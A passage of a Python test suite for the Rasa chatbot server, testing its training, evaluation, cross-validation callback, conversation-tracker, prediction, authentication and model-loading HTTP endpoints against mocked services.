    for prop in ("entities", "intent", "text"):
        assert prop in parsed
async def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicASGITestClient):
    """An unknown ``emulation_mode`` query value is rejected with 400."""
    endpoint = "/model/parse?emulation_mode=ANYTHING"
    _, response = await rasa_app_nlu.post(endpoint, json={"text": "hello"})
    assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_stack_success_with_md(
    rasa_app: SanicASGITestClient,
    default_domain_path: Text,
    default_stack_config: Text,
    default_nlu_data: Text,
    tmp_path: Path,
):
    """Training from a JSON payload with Markdown stories returns a model archive."""
    payload = dict(
        domain=Path(default_domain_path).read_text(),
        config=Path(default_stack_config).read_text(),
        stories=Path("data/test_stories/stories_defaultdomain.md").read_text(),
        nlu=Path(default_nlu_data).read_text(),
    )

    _, response = await rasa_app.post("/model/train", json=payload)
    assert response.status == HTTPStatus.OK

    # the archive comes back in the body, with its name in the headers
    assert response.headers["filename"] is not None

    # Consistency: reuse the shared helper instead of duplicating the
    # save/unpack/fingerprint logic inline (as the retrieval-events test does).
    assert_trained_model(response.body, tmp_path)
async def test_train_nlu_success(
    rasa_app: SanicASGITestClient,
    default_stack_config: Text,
    default_nlu_data: Text,
    default_domain_path: Text,
    tmp_path: Path,
):
    """Training from a combined YAML payload (domain+config+nlu) succeeds."""
    domain_data = rasa.shared.utils.io.read_yaml_file(default_domain_path)
    config_data = rasa.shared.utils.io.read_yaml_file(default_stack_config)
    nlu_data = rasa.shared.utils.io.read_yaml_file(default_nlu_data)

    # combine all data into our payload
    payload = {
        key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
    }

    data = StringIO()
    rasa.shared.utils.io.write_yaml(payload, data)

    _, response = await rasa_app.post(
        "/model/train",
        data=data.getvalue(),
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK

    # Consistency: reuse the shared helper instead of duplicating the
    # save/unpack/fingerprint logic inline (as the retrieval-events test does).
    assert_trained_model(response.body, tmp_path)
async def test_train_core_success_with(
    rasa_app: SanicASGITestClient,
    default_stack_config: Text,
    default_stories_file: Text,
    default_domain_path: Text,
    tmp_path: Path,
):
    """Training from concatenated YAML files (domain, config, stories) succeeds."""
    payload = f"""
{Path(default_domain_path).read_text()}
{Path(default_stack_config).read_text()}
{Path(default_stories_file).read_text()}
"""

    _, response = await rasa_app.post(
        "/model/train",
        data=payload,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK

    # Consistency: reuse the shared helper instead of duplicating the
    # save/unpack/fingerprint logic inline (as the retrieval-events test does).
    assert_trained_model(response.body, tmp_path)
async def test_train_with_retrieval_events_success(
    rasa_app: SanicASGITestClient, default_stack_config: Text, tmp_path: Path
):
    """Training data containing retrieval intents/responses trains successfully."""
    # ExitStack keeps all five files open together and closes them on exit
    with ExitStack() as stack:
        domain_file = stack.enter_context(
            open("data/test_domains/default_retrieval_intents.yml")
        )
        config_file = stack.enter_context(open(default_stack_config))
        core_file = stack.enter_context(
            open("data/test_stories/stories_retrieval_intents.md")
        )
        responses_file = stack.enter_context(open("data/test_responses/default.md"))
        nlu_file = stack.enter_context(
            open("data/test_nlu/default_retrieval_intents.md")
        )

        payload = dict(
            domain=domain_file.read(),
            config=config_file.read(),
            stories=core_file.read(),
            responses=responses_file.read(),
            nlu=nlu_file.read(),
        )

    # generous timeout: this performs a real training run
    _, response = await rasa_app.post("/model/train", json=payload, timeout=60 * 5)
    assert response.status == HTTPStatus.OK
    assert_trained_model(response.body, tmp_path)
def assert_trained_model(response_body: bytes, tmp_path: Path) -> None:
    """Persist a returned model archive and check it contains a fingerprint."""
    # save model to temporary file
    archive = tmp_path / "model.tar.gz"
    archive.write_bytes(response_body)

    # unpack model and ensure fingerprint is present
    unpacked = unpack_model(str(archive))
    assert os.path.exists(os.path.join(unpacked, "fingerprint.json"))
@pytest.mark.parametrize(
    "payload",
    [
        # deprecated top-level 'force' key
        {"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
        # both deprecated keys together
        {
            "config": None,
            "stories": None,
            "nlu": None,
            "domain": None,
            "force": False,
            "save_to_default_model_directory": True,
        },
        # deprecated 'save_to_default_model_directory' key alone
        {
            "config": None,
            "stories": None,
            "nlu": None,
            "domain": None,
            "save_to_default_model_directory": False,
        },
    ],
)
def test_deprecation_warnings_json_payload(payload: Dict):
    """Deprecated keys in the JSON training payload raise a FutureWarning."""
    with pytest.warns(FutureWarning):
        rasa.server._validate_json_training_payload(payload)
async def test_train_with_yaml(rasa_app: SanicASGITestClient, tmp_path: Path):
    """A single combined YAML payload trains end to end and yields an archive."""
    training_data = """
stories:
- story: My story
  steps:
  - intent: greet
  - action: utter_greet

rules:
- rule: My rule
  steps:
  - intent: greet
  - action: utter_greet

intents:
- greet

nlu:
- intent: greet
  examples: |
    - hi
    - hello

responses:
  utter_greet:
  - text: Hi

language: en

policies:
- name: RulePolicy

pipeline:
- name: KeywordIntentClassifier
"""
    _, response = await rasa_app.post(
        "/model/train",
        data=training_data,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK
    assert_trained_model(response.body, tmp_path)
async def test_train_with_invalid_yaml(rasa_app: SanicASGITestClient):
    """Malformed YAML in the training payload is rejected with 400."""
    invalid_yaml = """
rules:
rule my rule
"""

    _, response = await rasa_app.post(
        "/model/train",
        data=invalid_yaml,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
    "headers, expected",
    [({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
    headers: Dict, expected: bool, tmp_path: Path
):
    """The ``force_training`` query parameter maps onto the training payload."""
    request = Mock()
    request.body = b""
    # query parameters arrive via request.args
    request.args = headers

    payload = rasa.server._training_payload_from_yaml(request, tmp_path)
    assert payload.get("force_training") == expected
@pytest.mark.parametrize(
    "headers, expected",
    [
        # default: save into the standard models directory
        ({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
        # opting out yields some other (temporary) output path
        ({"save_to_default_model_directory": False}, ANY),
        (
            {"save_to_default_model_directory": True},
            rasa.shared.constants.DEFAULT_MODELS_PATH,
        ),
    ],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
    headers: Dict, expected: Text, tmp_path: Path
):
    """``save_to_default_model_directory`` controls the payload's output path."""
    request = Mock()
    request.body = b""
    # query parameters arrive via request.args
    request.args = headers

    payload = rasa.server._training_payload_from_yaml(request, tmp_path)
    assert payload.get("output")
    assert payload.get("output") == expected
async def test_train_missing_config(rasa_app: SanicASGITestClient):
    """A training payload without a config section is a client error (400)."""
    payload = {"domain": "domain data", "config": None}

    _, response = await rasa_app.post("/model/train", json=payload)
    assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_missing_training_data(rasa_app: SanicASGITestClient):
    """Domain and config alone, without training data, are rejected with 400."""
    payload = {"domain": "domain data", "config": "config data"}

    _, response = await rasa_app.post("/model/train", json=payload)
    assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_internal_error(rasa_app: SanicASGITestClient):
    """Syntactically complete but unusable training data surfaces as a 500."""
    payload = {"domain": "domain data", "config": "config data", "nlu": "nlu data"}

    _, response = await rasa_app.post("/model/train", json=payload)
    assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_stories(
    rasa_app: SanicASGITestClient, default_stories_file: Text
):
    """Story evaluation returns the full metrics payload (non-end-to-end)."""
    stories = rasa.shared.utils.io.read_file(default_stories_file)

    _, response = await rasa_app.post(
        "/model/test/stories",
        data=stories,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK

    js = response.json()
    # exact key set: nothing extra, nothing missing
    assert set(js.keys()) == {
        "report",
        "precision",
        "f1",
        "accuracy",
        "actions",
        "in_training_data_fraction",
        "is_end_to_end_evaluation",
    }
    # e2e was not requested, so the flag must be off
    assert not js["is_end_to_end_evaluation"]
    assert set(js["actions"][0].keys()) == {
        "action",
        "predicted",
        "confidence",
        "policy",
    }
async def test_evaluate_stories_not_ready_agent(
    rasa_app_nlu: SanicASGITestClient, default_stories_file: Text
):
    """Story evaluation on an NLU-only server answers 409 (no core agent)."""
    story_data = rasa.shared.utils.io.read_file(default_stories_file)

    _, response = await rasa_app_nlu.post("/model/test/stories", data=story_data)
    assert response.status == HTTPStatus.CONFLICT
async def test_evaluate_stories_end_to_end(
    rasa_app: SanicASGITestClient, end_to_end_test_story_file: Text
):
    """Story evaluation with ``e2e=true`` returns end-to-end metrics."""
    stories = rasa.shared.utils.io.read_file(end_to_end_test_story_file)

    _, response = await rasa_app.post("/model/test/stories?e2e=true", data=stories,)

    assert response.status == HTTPStatus.OK
    js = response.json()
    # exact key set: nothing extra, nothing missing
    assert set(js.keys()) == {
        "report",
        "precision",
        "f1",
        "accuracy",
        "actions",
        "in_training_data_fraction",
        "is_end_to_end_evaluation",
    }
    # e2e was requested, so the flag must be on and actions were evaluated
    assert js["is_end_to_end_evaluation"]
    assert js["actions"] != []
    assert set(js["actions"][0].keys()) == {
        "action",
        "predicted",
        "confidence",
        "policy",
    }
async def test_evaluate_intent(rasa_app: SanicASGITestClient, default_nlu_data: Text):
    """Intent evaluation over YAML NLU data returns the three metric sections."""
    nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)

    _, response = await rasa_app.post(
        "/model/test/intents",
        data=nlu_data,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK
    expected_sections = {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }
    assert set(response.json().keys()) == expected_sections
async def test_evaluate_intent_json(rasa_app: SanicASGITestClient):
    """Intent evaluation also accepts JSON-format NLU training data."""
    nlu_data = rasa.shared.utils.io.read_file("data/test/demo-rasa-small.json")

    # NOTE(review): ``nlu_data`` is the file's text, so ``json=`` sends a
    # JSON-encoded *string* rather than an object — confirm the server expects
    # exactly this shape.
    _, response = await rasa_app.post(
        "/model/test/intents",
        json=nlu_data,
        headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK
    assert set(response.json().keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
    """Pointing the evaluation at a nonexistent model archive yields a 500."""
    endpoint = "/model/test/intents?model=invalid.tar.gz"
    _, response = await rasa_app.post(
        endpoint,
        json={},
        headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
    """An intent-evaluation request with no payload is a client error (400)."""
    headers = {"Content-type": rasa.server.YAML_CONTENT_TYPE}
    _, response = await rasa_app.post("/model/test/intents", headers=headers,)

    assert response.status == HTTPStatus.BAD_REQUEST
async def test_evaluate_intent_on_just_nlu_model(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
    """Intent evaluation works against an NLU-only server as well."""
    nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)

    _, response = await rasa_app_nlu.post(
        "/model/test/intents",
        data=nlu_data,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK
    assert set(response.json().keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }
async def test_evaluate_intent_with_model_param(
    rasa_app: SanicASGITestClient, trained_nlu_model: Text, default_nlu_data: Text
):
    """Evaluating against an explicit model must not swap the loaded model."""
    # remember which model the server currently serves
    _, response = await rasa_app.get("/status")
    previous_model_file = response.json()["model_file"]

    nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)

    _, response = await rasa_app.post(
        f"/model/test/intents?model={trained_nlu_model}",
        data=nlu_data,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
    )

    assert response.status == HTTPStatus.OK
    assert set(response.json().keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }

    # the evaluation must leave the originally loaded model in place
    _, response = await rasa_app.get("/status")
    assert previous_model_file == response.json()["model_file"]
async def test_evaluate_intent_with_model_server(
    rasa_app: SanicASGITestClient,
    trained_rasa_model: Text,
    default_nlu_data: Text,
    tear_down_scheduler: None,
):
    """Evaluating against a test model server must not disturb the production one."""
    production_model_server_url = (
        "https://example.com/webhooks/actions?model=production"
    )
    test_model_server_url = "https://example.com/webhooks/actions?model=test"

    nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)

    with aioresponses() as mocked:
        # Mock retrieving the production model from the model server
        mocked.get(
            production_model_server_url,
            body=Path(trained_rasa_model).read_bytes(),
            headers={"ETag": "production"},
        )
        # Mock retrieving the test model from the model server
        mocked.get(
            test_model_server_url,
            body=Path(trained_rasa_model).read_bytes(),
            headers={"ETag": "test"},
        )

        agent_with_model_server = await load_agent(
            model_server=EndpointConfig(production_model_server_url)
        )
        rasa_app.app.agent = agent_with_model_server

        _, response = await rasa_app.post(
            f"/model/test/intents?model={test_model_server_url}",
            data=nlu_data,
            headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
        )

    assert response.status == HTTPStatus.OK
    assert set(response.json().keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }

    production_model_server = rasa_app.app.agent.model_server
    # Assert that the model server URL for the test didn't override the production
    # model server URL
    assert production_model_server.url == production_model_server_url
    # Assert the tests didn't break pulling the models
    assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
async def test_cross_validation(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
    """Cross-validating NLU data + config returns all three evaluation blocks."""
    training_payload = "\n".join(
        [Path(default_nlu_data).read_text(), Path(DEFAULT_STACK_CONFIG).read_text()]
    )
    _, response = await rasa_app_nlu.post(
        "/model/test/intents",
        data=training_payload,
        headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
        params={"cross_validation_folds": 3},
    )
    assert response.status == HTTPStatus.OK
    body = response.json()
    expected_metrics = ["precision", "f1_score", "report", "errors"]
    for evaluation_key in (
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    ):
        assert evaluation_key in body
        evaluation = body[evaluation_key]
        assert all(metric in evaluation for metric in expected_metrics)
async def test_cross_validation_with_md(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
    """Markdown training data is rejected for cross-validation with a 400."""
    payload = """
    ## intent: greet
    - Hi
    - Hello
    """
    _, bad_request_response = await rasa_app_nlu.post(
        "/model/test/intents", data=payload, params={"cross_validation_folds": 3},
    )
    assert bad_request_response.status == HTTPStatus.BAD_REQUEST
async def test_cross_validation_with_callback_success(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
    """With a callback URL, cross-validation runs in the background and POSTs
    its evaluation results to that URL while the request returns 204 at once.
    """
    nlu_data = Path(default_nlu_data).read_text()
    config = Path(DEFAULT_STACK_CONFIG).read_text()
    payload = f"{nlu_data}\n{config}"
    callback_url = "https://example.com/webhooks/actions"
    with aioresponses() as mocked:
        mocked.post(callback_url, payload={})
        # Stub the actual cross-validation; it must return one result per
        # evaluation type (intent, entity, response selection).
        mocked_cross_validation = Mock(
            return_value=(
                CVEvaluationResult({}, {}, {}),
                CVEvaluationResult({}, {}, {}),
                CVEvaluationResult({}, {}, {}),
            )
        )
        monkeypatch.setattr(
            rasa.nlu, rasa.nlu.cross_validate.__name__, mocked_cross_validation
        )
        _, response = await rasa_app_nlu.post(
            "/model/test/intents",
            data=payload,
            headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
            params={"cross_validation_folds": 3, "callback_url": callback_url},
        )
        assert response.status == HTTPStatus.NO_CONTENT
        # Sleep to give event loop time to process things in the background
        await asyncio.sleep(1)
        mocked_cross_validation.assert_called_once()
        last_request = latest_request(mocked, "POST", callback_url)
        assert last_request
        # The callback receives the serialized evaluation as the request body.
        content = last_request[0].kwargs["data"]
        response_body = json.loads(content)
        for required_key in {
            "intent_evaluation",
            "entity_evaluation",
            "response_selection_evaluation",
        }:
            assert required_key in response_body
            details = response_body[required_key]
            assert all(
                key in details for key in ["precision", "f1_score", "report", "errors"]
            )
async def test_cross_validation_with_callback_error(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
    """A failing cross-validation reports a 500 error payload to the callback URL."""
    training_payload = "\n".join(
        [Path(default_nlu_data).read_text(), Path(DEFAULT_STACK_CONFIG).read_text()]
    )
    # Make the patched cross-validation blow up.
    monkeypatch.setattr(
        rasa.nlu, rasa.nlu.cross_validate.__name__, Mock(side_effect=ValueError())
    )
    callback_url = "https://example.com/webhooks/actions"
    with aioresponses() as mocked:
        mocked.post(callback_url, payload={})
        _, response = await rasa_app_nlu.post(
            "/model/test/intents",
            data=training_payload,
            headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
            params={"cross_validation_folds": 3, "callback_url": callback_url},
        )
        assert response.status == HTTPStatus.NO_CONTENT
        # Let the event loop run the background task before inspecting the mock.
        await asyncio.sleep(1)
        callback_request = latest_request(mocked, "POST", callback_url)
        assert callback_request
        error_body = callback_request[0].kwargs["json"]
        assert error_body["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_callback_unexpected_error(
    rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
    """An unexpected server-side error is reported to the callback URL.

    `_training_payload_from_yaml` is patched to raise; the request itself is
    still accepted (204) and the failure arrives asynchronously as a 500
    payload on the callback.

    (Fix: removed the unused local coroutine `raiseUnexpectedError` — it was
    defined but never referenced; the Mock below is what actually raises.)
    """
    nlu_data = Path(default_nlu_data).read_text()
    config = Path(DEFAULT_STACK_CONFIG).read_text()
    payload = f"{nlu_data}\n{config}"
    monkeypatch.setattr(
        rasa.server,
        rasa.server._training_payload_from_yaml.__name__,
        Mock(side_effect=ValueError()),
    )
    callback_url = "https://example.com/webhooks/actions"
    with aioresponses() as mocked:
        mocked.post(callback_url, payload={})
        _, response = await rasa_app_nlu.post(
            "/model/test/intents",
            data=payload,
            headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
            params={"cross_validation_folds": 3, "callback_url": callback_url},
        )
        assert response.status == HTTPStatus.NO_CONTENT
        # Give the event loop time to run the callback in the background.
        await asyncio.sleep(1)
        last_request = latest_request(mocked, "POST", callback_url)
        assert last_request
        content = last_request[0].kwargs["json"]
        assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_predict(rasa_app: SanicASGITestClient):
    """POST /model/predict on a serialized event list returns scores, tracker
    and policy information.
    """
    tracker_events = {
        "Events": {
            "value": [
                {"event": "action", "name": "action_listen"},
                {
                    "event": "user",
                    "text": "hello",
                    "parse_data": {
                        "entities": [],
                        "intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
                        "text": "hello",
                    },
                },
            ]
        }
    }
    _, response = await rasa_app.post(
        "/model/predict",
        json=tracker_events,
        headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK
    body = response.json()
    for expected_key in ("scores", "tracker", "policy"):
        assert expected_key in body
@freeze_time("2018-01-01")
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
    """Fetching the tracker of an unknown sender implicitly creates one that
    contains only the session-start sequence (time frozen so the expected
    timestamps are stable).
    """
    _, response = await rasa_app.get("/conversations/madeupid/tracker")
    content = response.json()
    assert response.status == HTTPStatus.OK
    assert content["paused"] is False
    assert content["slots"] == {
        "name": None,
        REQUESTED_SLOT: None,
        SESSION_START_METADATA_SLOT: None,
    }
    assert content["sender_id"] == "madeupid"
    # 1514764800 is the epoch timestamp of the frozen 2018-01-01.
    assert content["events"] == [
        {
            "event": "action",
            "name": "action_session_start",
            "policy": None,
            "confidence": 1,
            "timestamp": 1514764800,
            "action_text": None,
        },
        {"event": "session_started", "timestamp": 1514764800},
        {
            "event": "action",
            # NOTE(review): INTENT_NAME_KEY is used as the key of an *action*
            # name here while the first event uses the literal "name" —
            # presumably the constant equals "name"; verify.
            INTENT_NAME_KEY: "action_listen",
            "policy": None,
            "confidence": None,
            "timestamp": 1514764800,
            "action_text": None,
        },
    ]
    assert content["latest_message"] == {
        "text": None,
        "intent": {},
        "entities": [],
        "message_id": None,
        "metadata": {},
    }
@pytest.mark.parametrize("event", test_events)
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
    """A single POSTed event lands on the tracker after the session-start
    sequence and gets a fresh server-side timestamp.
    """
    conversation_id = str(uuid.uuid1())
    payload = event.as_dict()
    # Drop the timestamp so the server has to assign a new one.
    payload.pop("timestamp")
    before_post = time.time()
    _, response = await rasa_app.post(
        f"/conversations/{conversation_id}/tracker/events",
        json=payload,
        headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK
    assert response.json() is not None
    _, tracker_response = await rasa_app.get(
        f"/conversations/{conversation_id}/tracker"
    )
    tracker = tracker_response.json()
    assert tracker is not None
    assert len(tracker.get("events")) == 4
    events_on_tracker = [Event.from_parameters(e) for e in tracker["events"]]
    # The tracker starts with the session-start sequence, then our event.
    assert events_on_tracker[:3] == session_start_sequence
    assert events_on_tracker[3] == event
    assert events_on_tracker[3].timestamp > before_post
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
    """POSTing a list of events appends all of them after the session start."""
    conversation_id = str(uuid.uuid1())
    serialized_events = [event.as_dict() for event in test_events]
    _, response = await rasa_app.post(
        f"/conversations/{conversation_id}/tracker/events",
        json=serialized_events,
        headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK
    assert response.json() is not None
    _, tracker_response = await rasa_app.get(
        f"/conversations/{conversation_id}/tracker"
    )
    tracker = tracker_response.json()
    assert tracker is not None
    deserialized = [Event.from_parameters(e) for e in tracker.get("events")]
    # There is an initial session-start sequence at the beginning.
    assert deserialized == session_start_sequence + test_events
@pytest.mark.parametrize(
    "params", ["?execute_side_effects=true&output_channel=callback", ""]
)
async def test_pushing_event_while_executing_side_effects(
    rasa_server: Sanic, params: Text
):
    """Appending events only forwards bot messages to the output channel when
    `execute_side_effects=true` and an output channel are requested.
    """
    input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
    channel.register([input_channel], rasa_server, "/webhooks/")
    rasa_app = rasa_server.asgi_client
    sender_id = str(uuid.uuid1())
    conversation = f"/conversations/{sender_id}"
    serialized_event = test_events[1].as_dict()
    with aioresponses() as mocked:
        # The callback channel delivers bot messages by POSTing here.
        mocked.post(
            "https://example.com/callback",
            repeat=True,
            headers={"Content-Type": "application/json"},
        )
        await rasa_app.post(
            f"{conversation}/tracker/events{params}",
            json=serialized_event,
            headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
        )
        r = latest_request(mocked, "post", "https://example.com/callback")
        if not params:
            # Without the query params no side effects run -> nothing is sent.
            assert r is None
        else:
            message_received = json_of_latest_request(r)
            assert message_received.get("recipient_id") == sender_id
            assert message_received.get("text") == serialized_event.get("text")
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
    """Conversation IDs containing '/' and other special characters round-trip."""
    raw_id = str(uuid.uuid1())
    half = len(raw_id) // 2
    # Splice special characters into the middle of the ID.
    conversation_id = raw_id[:half] + "/+-_\\=" + raw_id[half:]
    serialized_events = [event.as_dict() for event in test_events]
    _, response = await rasa_app.post(
        f"/conversations/{conversation_id}/tracker/events",
        json=serialized_events,
        headers={"Content-Type": "application/json"},
    )
    assert response.status == HTTPStatus.OK
    assert response.json() is not None
    _, tracker_response = await rasa_app.get(
        f"/conversations/{conversation_id}/tracker"
    )
    tracker = tracker_response.json()
    assert tracker is not None
    # A session-start sequence precedes the pushed events.
    assert [
        Event.from_parameters(e) for e in tracker.get("events")
    ] == session_start_sequence + test_events
async def test_put_tracker(rasa_app: SanicASGITestClient):
    """PUT replaces the tracker's events wholesale (no session-start prefix)."""
    serialized = [e.as_dict() for e in test_events]
    _, response = await rasa_app.put(
        "/conversations/pushtracker/tracker/events",
        json=serialized,
        headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK
    body = response.json()
    assert body["sender_id"] == "pushtracker"
    assert len(body["events"]) == len(test_events)
    _, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
    tracker = tracker_response.json()
    assert tracker is not None
    assert events.deserialise_events(tracker.get("events")) == test_events
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
    """Predicting for an unknown conversation ID yields a 404."""
    _, not_found_response = await rasa_app.post(
        "/conversations/non_existent_id/predict"
    )
    assert not_found_response.status == HTTPStatus.NOT_FOUND
    assert not_found_response.json()["message"] == "Conversation ID not found."
async def test_sorted_predict(rasa_app: SanicASGITestClient):
    """Action scores come back sorted by descending score, then action name."""
    await _create_tracker_for_sender(rasa_app, "sortedpredict")
    _, response = await rasa_app.post("/conversations/sortedpredict/predict")
    scores = response.json()["scores"]
    assert scores == sorted(scores, key=lambda s: (-s["score"], s["action"]))
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
    """Seed a tracker for `sender_id` by replacing its events with the first
    three test events.
    """
    initial_events = [e.as_dict() for e in test_events[:3]]
    _, response = await app.put(
        f"/conversations/{sender_id}/tracker/events",
        json=initial_events,
        headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
    )
    assert response.status == HTTPStatus.OK
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
    """JWT auth: admins may read any tracker; plain users only their own."""
    # token generated with secret "core" and algorithm HS256
    # on https://jwt.io/
    # {"user": {"username": "testadmin", "role": "admin"}}
    jwt_header = {
        "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
        "eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
        "m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
        "QRre7IWTuIDrCn5AIw"
    }
    # An admin can read both its own and other users' trackers.
    _, response = await rasa_secured_app.get(
        "/conversations/testadmin/tracker", headers=jwt_header
    )
    assert response.status == HTTPStatus.OK
    _, response = await rasa_secured_app.get(
        "/conversations/testuser/tracker", headers=jwt_header
    )
    assert response.status == HTTPStatus.OK
    # {"user": {"username": "testuser", "role": "user"}}
    jwt_header = {
        "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
        "eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
        "2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
        "HJHOxxC_w7TtwCrs"
    }
    # A plain user may not read another user's tracker ...
    _, response = await rasa_secured_app.get(
        "/conversations/testadmin/tracker", headers=jwt_header
    )
    assert response.status == HTTPStatus.FORBIDDEN
    # ... but may read its own.
    _, response = await rasa_secured_app.get(
        "/conversations/testuser/tracker", headers=jwt_header
    )
    assert response.status == HTTPStatus.OK
def test_list_routes(default_agent: Agent):
    """The server app exposes exactly the expected set of named routes."""
    app = rasa.server.create_app(default_agent, auth_token=None)
    expected_routes = {
        "hello",
        "version",
        "status",
        "retrieve_tracker",
        "append_events",
        "replace_events",
        "retrieve_story",
        "execute_action",
        "trigger_intent",
        "predict",
        "add_message",
        "train",
        "evaluate_stories",
        "evaluate_intents",
        "tracker_predict",
        "parse",
        "load_model",
        "unload_model",
        "get_domain",
    }
    assert set(utils.list_routes(app).keys()) == expected_routes
async def test_unload_model_error(rasa_app: SanicASGITestClient):
    """DELETE /model succeeds with 204 while a model is currently loaded."""
    _, status_response = await rasa_app.get("/status")
    assert status_response.status == HTTPStatus.OK
    status = status_response.json()
    assert "model_file" in status
    assert status["model_file"] is not None
    _, delete_response = await rasa_app.delete("/model")
    assert delete_response.status == HTTPStatus.NO_CONTENT
async def test_get_domain(rasa_app: SanicASGITestClient):
    """GET /domain with a JSON accept header returns the serialized domain."""
    _, response = await rasa_app.get(
        "/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
    )
    assert response.status == HTTPStatus.OK
    domain_json = response.json()
    for section in ("config", "intents", "entities", "slots", "responses", "actions"):
        assert section in domain_json
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
    """Requesting the domain without an Accept header yields 406."""
    _, not_acceptable_response = await rasa_app.get("/domain")
    assert not_acceptable_response.status == HTTPStatus.NOT_ACCEPTABLE
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
    """Loading a different model via PUT /model changes the status fingerprint."""
    _, status_response = await rasa_app.get("/status")
    assert status_response.status == HTTPStatus.OK
    assert "fingerprint" in status_response.json()
    fingerprint_before = status_response.json()["fingerprint"]
    _, put_response = await rasa_app.put(
        "/model", json={"model_file": trained_core_model}
    )
    assert put_response.status == HTTPStatus.NO_CONTENT
    _, status_response = await rasa_app.get("/status")
    assert status_response.status == HTTPStatus.OK
    assert "fingerprint" in status_response.json()
    assert fingerprint_before != status_response.json()["fingerprint"]
async def test_load_model_from_model_server(
    rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
    """PUT /model with a model-server endpoint downloads and activates the model.

    (Fix: removed dead code — the original built a ``Content-Length`` header
    via ``os.fstat`` but never passed it to the mock.)
    """
    _, response = await rasa_app.get("/status")
    assert response.status == HTTPStatus.OK
    assert "fingerprint" in response.json()
    old_fingerprint = response.json()["fingerprint"]
